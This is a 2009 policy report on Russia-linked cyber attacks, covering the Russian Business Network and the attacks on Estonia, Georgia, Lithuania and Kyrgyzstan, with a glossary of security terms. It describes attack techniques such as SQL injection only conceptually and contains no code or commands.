May 13, 2009
Russia and the Cyber Threat
What Is Cyber Security?
Please see the glossary for an explanation of terms used in this document.
Cyber security is becoming a buzzword in the public understanding of national security. In November 2008, computer-based attacks on the Department of Defense, Department of State, and White House made national news. In August 2008, cyber attacks on Georgia, originating in Russia, were widely reported and debated. Though public awareness of these attacks is recent, professional attention has focused on cyber threats for much longer. The first presidential commission to report on the potential for a cyber threat to national security was in 1998, and in 2001, President George W. Bush declared cyber security a national priority. In 2002, the Professionals for Cyber Defense, a group of cyber security experts, wrote an open letter to President Bush, warning him of the potential for a terrorist cyber attack on critical infrastructure in the United States and urging him to create a Manhattan Project-style cyber defense project. After a series of cyber attacks in 2007 on the Departments of Defense, State, Commerce, and Homeland Security, as well as NASA and the National Defense University (during which the defense secretary’s unclassified email was hacked), President Bush signed a highly classified order in January 2008 that created the Comprehensive National Cybersecurity Initiative (CNCI). In July 2008, then-presidential candidate Barack Obama showed similar concern about cyber security, vowing to declare the American. “cyber infrastructure a strategic asset” should he become president. In early December 2008, the Center for Strategic and International Studies Commission on Cybersecurity for the 44th Presidency, which began work in August 2007, released its report and recommendations on a national cyber security policy, which included the creation of a comprehensive national strategy that goes beyond the CNCI and includes strict privacy protection, the creation of a so-called cyber czar in the Executive Office of the President, and stricter regulation of cyberspace.
While the narrow definition of cyberspace refers strictly to the Internet, the application of a more comprehensive definition that includes all forms of networked and digital activities is more appropriate when addressing issues of cyber security. In addition to Internet threats that can take down networks (e.g., malware, viruses, Trojans, and denial of service [DOS] attacks) and those that can steal, contaminate, or destroy information (e.g., malware, Trojans, worms, and phishing), cyber attacks can involve the disruption of telephone networks, satellites, weaponry systems, banking systems, and even utility networks. While cyber crimes and cyber attacks are both easily defined, distinguishing cyber warfare and cyber terrorism from them is difficult. Some experts argue that any cyber attack that causes widespread harm is cyber war, though that begs the question of what constitutes harm—psychological, economic, or physical threats, or some combination of them? Other experts argue that cyber attacks can be categorized as warfare only if they take place alongside actual military operations. This definition does not imply anything about the level of harm caused. Under the first definition, the 2007 cyber attacks on Estonia, which also originated in Russia, would constitute cyber warfare, but those against Georgia in 2008 would not (assuming physical harm). Under the second definition, the Georgia attack would be considered cyberwar, but the Estonia attack would not. Cyber terrorism is even more controversial, with some experts arguing it cannot exist because cyber attacks are unlikely to create terror, while others (such as the National Conference of State Legislatures) limit it only to the use of information technology for attacks or threats by terrorist organizations. The broadest definition, created by Kevin Coleman of the Technolytics Institute, classifies cyber terrorism as “the premeditated use of disruptive activities, or the threat thereof, against computers and/or networks, with the intention to cause harm or further social, ideological, religious, political, or similar objectives. Or to intimidate any person in the furtherance of such objectives.” It is worth noting that this definition of cyber terrorism would include all the attacks originating in Russia that are discussed throughout this report.
The primary origins of cyber threats to the United States are Russia, China, and terrorist organizations. Though the Professionals for Cyber Defense referred to Iran as a cyber threat in 2002, Iran does not yet seem to possess the cyber capabilities or experience necessary to warrant this label. This report will focus on Internet-based cyber attacks, which seem to be the primary cyber threat emanating from Russia.
Russia and Cyber Attacks
In recent years, Russia has been accused of conducting cyber attacks or cyber terrorism against political opponents. The Russian government has denied all culpability, pointing out that though the attacks can be traced to Russia, they cannot be traced to government agents or computers. Instead, these attacks were incidents of “hacktivism,” perpetrated out of patriotism by anonymous citizens. Even if these attacks could be traced to government computers, it would not be solid proof. A number of the attacks have included DOS attacks using a vast bot network. A bot is a computer infected by a virus, worm, or other malware that reprograms the computer to respond, on command, to an outside server (the command and control, or C&C, server). The C&C server can then order a network of such bots to participate in a DOS attack. Think of it as cyber brainwashing. In the May 2007 cyber attacks on Estonia, a number of Estonian government computers were infected and became part of the attacking bot network. If Russian government computers had been involved, the Kremlin could have claimed the computers were infected bots. If a large number of its computers had been involved, the Russian government would have lost its deniability, but that has yet to be the case. A closer examination of the cyber environment in Russia—in particular, the close connections between hacktivism and cyber crime, and cyber crime and the government—contradicts the Russian government’s denial of involvement.
The Cyber Environment
One of Russia’s greatest cyber advantages is its wealth of human capital. Russia has a very high education rate that, combined with the Soviet legacy of emphasizing math and science education, has created a large labor pool of well-educated technology specialists. Just as “ekonomist” used to be the most popular college degree in Soviet times, “programmist” is now. This is also a relatively cheap labor pool: though Russian IT specialists make more than average Russian workers do, they are paid only 15-20 percent as much as American IT specialists, despite their reputation for reliability and creativity. The software industry is one of the most productive sectors in Russia and certainly the most internationally competitive. Russia’s software industry is booming and expanding into the international market, but its hardware subsector lags behind. Broadband, while currently small, is growing, and wireless Internet is rapidly expanding in major cities, especially Moscow. Internet penetration and use remain low, especially outside of the big cities. Overall, the IT sector has great potential for development, but the government does not seem to rank developing the IT sector high among its priorities, despite calls for Russia to become a nanotechnology leader. There is also one serious weakness in Russia’s IT labor pool: though they are highly educated, many Russian IT specialists lack experience on different systems and have little understanding of the broader IT industry.
Given Russia’s wealth of computer-savvy individuals who have limited outlets for their skills, it is no surprise that hacking and cyber crime are common there, especially taking into account the context of other crime and law-bending and breaking. Corruption is rampant in Russia on all levels, fostering an attitude of indifference toward laws, as well as admiration for those who successfully break them. While the majority of Russians consider corruption wrong, many of them also are perfectly willing to cooperate in it when it benefits them. Most cyber crime in Russia is financially based, such as carding, phishing, and extortion. The use of Trojans, malware, and spybots also is very common. Hacking for the sake of a challenge and politically motivated “hacktivism” are also present, and these tend to involve Web site defacement and distributed denial of service (DDOS) attacks. Most cyber crime is aimed at foreign targets, especially Western financial institutions, which makes law enforcement difficult and contributes to the esteemed reputation that khakery (Russian hackers) have in Russian society. There is a culture of resentment in Russia aimed toward rich Westerners: if they don’t properly secure their networks and Web sites, they deserve to be scammed. Russian law enforcement expends very little effort on cyber crime unless it is aimed at Russians and Russian businesses. They care little about attacks on foreign businesses, which are not their problem. There are even widely available magazines for hackers, such as Khaker, that thrive despite the strict governmental control on all media (which often overrides the “free speech” guarantee). Khaker’s website, xakep.ru (which mimics the Cyrillic spelling of “hacker”), is bustling and easily accessible.
Russian authorities’ tepid response to cyber crime is due as much to incapacity as to apathy. There are few policemen who are skilled in fighting cyber crime, and even fewer willing to forgo the greater prestige and resources associated with other crime fighting fields such as narcotics and organized crime. Interestingly, there is strong evidence that Russian organized-crime syndicates have become very involved in cyber crime, though this does not seem to factor into the Russian police approach, which continues to segregate cyber crime from all other crime fields. The coordination, strategic sophistication, and targets of certain cyber attacks indicate that they are often committed by a well-financed and experienced group (or groups) of criminals.
Russian Business Network
The Russian Business Network (RBN) is one such group. RBN is a cyber crime organization that ran an Internet service provider (ISP) until 2007 and continues to be heavily involved in cyber crime such as phishing, malware distribution, malicious code, botnet command and control, DDOS attacks, and child pornography. Though the most recent structure of RBN began in 2005, there are rumors that date RBN (as an unofficial group of cyber criminals) back to 1996. In 2002, the group became more structured and more active. It was accused of attacking the United States Department of Defense and the Russian Department of the Treasury in 2003, though none of this can be proven officially. While it is not certain that RBN is directly connected to the Russian mafia, it is highly likely. RBN is heavily involved in child pornography, which is traditionally controlled by the Russian mafia, and its official leader, who goes by the alias “Flyman,” is suspected of running those operations (and of possibly being a pedophile himself). It is also known that Flyman has family connections to the government: his father or uncle was involved in politics in St. Petersburg before taking an important position at a ministry in Moscow. Another RBN member, Aleksandr Boykov, is a former lieutenant colonel in the Federalnaya Sluzhba Bezopasnosti (FSB, the successor agency to the KGB). While it is currently not possible to prove that RBN has worked in tandem with the FSB or other security services (collectively, the siloviki), it is likely that they are at least connected.
When RBN officially hosted Internet services between early 2006 and November 2007, it was linked to 60 percent of all cyber crime. Due to increased pressure (including blocking and blacklisting of RBN IP addresses and domains) from the cyber security industry and increased attention in published reports and news articles, RBN attempted to restructure itself in October 2007, concealing its affiliations with a variety of IPs. When this failed, it deleted a number of its domains and shut down, moving to Chinese and Taiwanese networks on November 6, 2007. This failed to divert attention, however, and two days later, it ceased routing traffic and its networks. However, it would be incorrect to say that RBN no longer exists or even that it has disbanded. While it no longer runs an ISP, the group appears to be active still and harder to track on a much more disbursed level across a variety of mostly legit ISPs. In general, Russian cyber crime certainly has not decreased with the end of RBN’s ISP. Instead, it continues to grow, spread across a variety of ISPs and domains, and in February 2008, Russia surpassed China as the largest generator of malware, with 27.9 percent compared to China’s 26.5 percent (the United States is a distant third at 9.98 percent). Cyber security experts continue to use the term “RBN” to refer to the loosely organized group of cyber criminals based in Russia, and cyber activity and crime by this group continue to remain high.
Cyber Warfare and Hacktivism
While the most well-known cyber attacks attributed to Russia and the Russian government have occurred only within the last two years, cyber attacks have long been a part of Russian strategy. At an international conference in 1998, Oleg Gordievsky, a KGB colonel who defected to MI6 in 1985, spoke about the alternative to prison that Russia sometimes offered to hackers convicted of cyber crimes: working for the FSB. The editor of Khaker confirmed the FSB’s use of hackers for domestic and foreign espionage. In 1999, the Moonlight Maze Operation, a series of coordinated cyber attacks, penetrated computer networks at the Pentagon, NASA, university research centers, and defense contractors. In the attacks, which took place over the course of a year, hackers stole millions of dollars’ worth of research and development secrets. The attacks were traced back to Russia, and it is suspected this was a government-sponsored espionage campaign. One domestic target of FSB cyber activities has been Chechen rebel Web sites. In 2002, timed to coincide with the Russian Special Forces actions in the Moscow theater crisis, the main Chechen rebel Web sites were attacked by a group of hackers using a rather sophisticated method. All indicators point to the FSB. Given RBN’s connections to the Kremlin, its suspected 2003 attack on the Pentagon may have been a siloviki-ordered incidence of Russia’s cyber warfare. In another indication that the government encourages, if not directs, the use of cyber attacks against political opponents, Russian Duma deputy Nikolai Kuryanovich wrote a letter in March 2006 congratulating hackers on an attack against Israeli Web sites, urging the hackers to continue their work and claiming, “In the very near future, many conflicts will not take place on the open field of battle, but rather in spaces on the Internet, fought with the aid of information soldiers, that is, hackers.”
The Russian government also pursues a policy of censoring independent or opposition Web sites, and while those sites registered in the country often are easily shut down, many such sites have responded by moving outside of the .ru domain. Since Moscow has yet to convince Western governments to cooperate in shutting down such Web sites (usually designated as “extremist” or “terrorist” by the Kremlin), the new strategy has been to use cyber attacks to shut down the Web sites. This occurred in 2005, after Sweden refused to take down a pro-Chechen site registered there, and the Kremlin tried to take down the prominent opposition Web site, Ingushetia.ru, by similar means after it moved to the .org domain in September 2008.
Since 2006, there have been four major incidents of hacker attacks originating in Russia against foreign governments. In March 2006, during the Ukrainian parliamentary elections, the Ukrainian Central Election Commission’s servers and network were repeatedly attacked, totaling nearly 29,000 attacks. Most failed, so the servers continued to operate. iDefense attributes responsibility to Russian actors or even the Russian government.
The next cyber attack is one of the most well known. In late April 2007, Estonia came under a series of very serious cyber attacks originating mainly in Russia. The attacks were in response to tensions surrounding the move of a World War II memorial depicting a Soviet soldier. They were planned in advance and at least somewhat coordinated, as Russian-language forums were full of the preparations and planning in the days leading up to the attacks. The Estonian government even planned to release news of the strike three days before it began, but was dissuaded by the European Union (EU) because of an upcoming meeting between then-EU president and German chancellor Angela Merkel and Russian president Vladimir Putin. The attacks were mostly DDOS, using vast bot networks and malware-corrupted computers (many of which were within Estonia), and managed to seriously strain Estonia’s Web servers and networks. While these attacks cannot be directly traced back to the Russian government, the Kremlin is widely suspected to have at least encouraged them and perhaps been involved through groups with government ties, such as RBN. The Kremlin’s refusal to cooperate with Estonian and NATO investigations into the attacks indicates Russian government or siloviki involvement.
On June 25, 2008, the Estonian television channel ETV24 reported the prevalence of appeals for cyber attacks by Russian hackers against Estonia, Latvia, Lithuania, and Ukraine on Russian Internet forums. The following weekend, a cyber attack against Lithuania began, and government, commercial, and private Web sites were defaced with vicious slogans and Communist symbols (earlier that summer, Lithuania passed a law against the display of Communist symbols, angering Russia). The attack was short and the Web sites were fixed by early July. However, Lithuania was hit again on July 20, when the state tax Web site was taken down for the weekend with DDOS attacks. Both attacks can be traced back to Russia. That same day, the Georgian president’s Web site was taken down for more than twenty-four hours by DDOS attacks that were traced back to Russia and operatives connected to RBN.
Over the next couple of weeks, Russian Web forums were filled with active discussions about whether attacks and defacements aimed at Georgian Web sites were wise or if they would become a tool for the Western media to use against Russia. The attacks, which were initially assumed to be mainly DDOS, began shortly before Russian troops entered Georgia on August 8, and the defacements and the peak of attacks hit the same day. The Georgian government’s Web site was taken offline, as were a number of Georgian news sites. Some retaliatory hacking took place, as RIA Novosti (a Russian news service) was taken offline for ten hours and a couple of South Ossetian sites were defaced, showing the content of a Georgian news site instead of their own content. However, some of the attacks continued through late August. Initial assessments categorized the perpetrators into two groups—script kiddies and hacktivists, and government and criminal-linked groups—and assumed they worked separately but concurrently.
Further study of these attacks—especially by Project Grey Goose, the open-source social network analysis of the cyber attacks, run by Jeff Carr of the IntelFusion blog—proves some of these assumptions wrong. Project Grey Goose collected data from two Russian hacker Web sites: the aforementioned xakep.ru, Khaker’s Web site; and a private, password-protected Web site, StopGeorgia.ru, linked on xakep.ru. Project Grey Goose found that while some of the attacks were basic DDOS, most used a much more sophisticated technique. This was a new twist on the SQL injection vulnerability, which involved intentionally using a BENCHMARK query to cause a DOS. SQL, or Structured Query Language, is a database computer language used when managing or retrieving data. An SQL injection is a method of exploiting insecure application coding procedures. When an application or Web site has poor user-input filtering or weakly defined commands, a hacker can insert a new SQL command into the preexisting commands by using the Web as a way to deliver the new command to the stored database. The hacker can then steal, corrupt, or destroy data, as well as compromise the system hosting the database. One weakness with the SQL injection is that it will not always return readable data (this is called a blind SQL injection). In order to get around this, hackers started using the BENCHMARK query, a common computing procedure that involves including a Boolean (true or false) clause in the SQL injection. If, and only if, the injection is successful, the database will run the BENCHMARK query. Hackers choose BENCHMARK queries that are CPU intensive and, thus, take time, stalling the backend (the site from which the query was inserted). If a Web site stalls briefly before loading the page, the hacker knows the query was successful. While this is a sophisticated attack, it is not unheard of. What made the Russian hackers’ attack unique was the use of the BENCHMARK query to tie up the hosting CPU in running the functions, simulating a DOS attack. This was something Project Grey Goose members had never seen before and found very concerning. An SWL injection attack could result in corrupted databases and stolen data, hacker access to legitimate usernames and passwords, corruption of the machine hosting the database, and use of the corrupted machine to easily attack the internal network. More alarmingly, when the SQL injection is run during a DOS attack, it is extremely difficult to detect, so the victims might not know the extent of corruption or contamination of their machines, systems, and networks.
This attack was much more sophisticated than previous Russian cyber attacks. As evidenced by site traffic, the attack was clearly the result of days of planning, serious organization, and targeted reconnaissance. Given that some of the cyber attacks began before Russia’s ground assault on Georgia and how quickly the StopGeorgia.ru Web site popped up, it is clear that the organizers of the cyber attack had preknowledge; if the attack organizers were not directly affiliated with the government, military, or security services, they at least had some sort of connections. Project Grey Goose also found that the amateurs and professionals were not isolated groups, as previously assumed. Instead, the attack organizers used a journeyman-apprentice approach in which computer and Internet-savvy hackers (perhaps working for the government or RBN, or at least connected to them) set up the Web site; planned and organized the attacks; and provided the necessary tools, directions, and training, along with guidance along the way to amateurs, average computer users, and other “Russian patriots” recruited to help out.
Other cyber security experts investigating the attacks on Georgia also found evidence of involvement by members of RBN and the security services. The defacement of Georgian president Mikheil Saakashvili’s Web site, which included a photo collage comparing him to Adolph Hitler, is considered a psychological operation; to many cyber experts, its sophistication suggests the involvement of the siloviki. Jart Armin, author of a blog appropriately named “Russian Business Network,” and who helped take down RBN’s ISP; and James McQuaid of the Secure Home Network blog, were both able to trace attacks back to RBN members. McQuaid identified Alexandr Boykov and Sergei Smirnov as tied to the domains and IP addresses from which at least some of the attacks originated. He also traced the main spam attack, an e-mail purporting to be from the BBC that claimed Saakashvili was gay, and that was linked to a virus-infected website, to Alexei Vasiliev via the IP address of the Web site. Vasiliev is affiliated with RBN, as is Sergei Astakov, to whom McQuaid was able to trace the C&C server for many of the botnet DDOS attacks.
The Future Role of Cyber Attacks
While none of the investigations into the cyber attacks on Georgia or Estonia have proof of Russian government involvement, they have found significant evidence of the involvement of RBN and, at the very least, implicit encouragement from the government. As Project Grey Goose stated in its phase one report, there are limits to open-source intelligence that may have prevented it from finding the government links, and “it is not reasonable to conclude that no such connection exists.” The use of cyber attacks as a political strategy seems to be gaining credence and popularity in Russia (perhaps as innovation also rises), and when Russia is involved in future political conflicts, we can expect to see a strong cyber involvement. It will likely follow a similar pattern of strong deniability on the Russian government’s part, concrete links to RBN members, probable connections to the siloviki, the journeyman-apprenticeship approach, implicit government support for the “Russian patriot” hackers, and Russian government refusal to cooperate with international investigations. Particularly concerning for the former Soviet republics, the United States, and others who find themselves in disagreement with Russia are the growing sophistication of the attacks; the possible expansion of attackers’ recruits to Russian expats; and the possibility of Russian cyber warriors selling their skills, labor, and expertise to other states (such as Iran) or organizations (such as Hamas or Hezbollah, which enjoy sympathy and support in Russia). There is already evidence this has occurred. In late January 2009, DDOS attacks originating in Russia took down three of Kyrgyzstan’s four ISPs. Of the two motives offered for this attack—that they were part of a Kremlin-backed campaign to persuade Bishkek, the capital of Kyrgyzstan, to expel the United States from the airbase at Manas, or that Russian hackers were hired by Kyrgyzstan president Kurmanbek Bakiyev to silence his political opposition—the latter has gained more credence. The attacks are a repeat of the cyber attacks against the Bakiyev-led opposition in 2005, on the eve of the Tulip Revolution, and coincide with a larger crackdown on the opposition by the Kremlin-supported president. Moscow controls the servers from which the attacks occurred; while not directly involved, the Kremlin could have chosen to stop the attacks if it so desired. This tacit approval is a pattern sure to be continued. While it is not a new concern in national security, cyber security is a concern that demands much more attention than it has received.
bot- a computer infected by a virus, worm, or other malware that reprograms the computer to respond, on command, to an outside server
carding- the process of verifying stolen credit card data before using it for large frauds
command and control (C&C) server- the server that controls bots in a denial of service attack
cyberspace- the global electromagnetic domain that includes all forms of networked and digital activities
cyber attack- an attack that involves the cyber domain
cyber crime- any criminal activity that takes place in, through, or directly with cyberspace
cyber security- the field of maintaining the integrity and confidentiality of systems, networks, equipment, and communications that use cyberspace
cyber terrorism- the premeditated threat or use of disruptive activities against computers and networks, with the goal of causing harm or intimidation or to further a political, social, religious, or other agenda
cyber warfare- 1. any cyber attack that causes widespread harm; 2. cyber attacks that take place alongside actual military operations
denial of service (DOS) attack- a cyber attack with the intent of making a computer resource unavailable; the most typical method involves overloading a machine, Web site, or server with external communication requests, slowing it down and preventing it from receiving or responding to legitimate requests
distributed denial of service (DDOS) attack- a DOS attack that originates from multiple compromised computers; the individual computers become part of the bot network controlled by the C&C server
hacktivist- a hacker who has a political purpose
malware- malicious software designed to infiltrate or damage a computer or server
phishing- a form of fraud involving trying to obtain sensitive information by masquerading as a legitimate or trustworthy entity
script kiddie- an amateur malicious hacker (usually someone who uses programs developed by others)
spamming- abusing e-mail to indiscriminately send bulk messages
Trojan- a type of malware that masquerades as something useful or something that performs a desired function
virus- a malicious computer program that can copy itself and infect a computer without the permission or knowledge of the computer’s user
worm- a self-replicating program that uses the network to send copies of itself to other computers; unlike viruses, which usually damage the infected computer, worms usually damage the network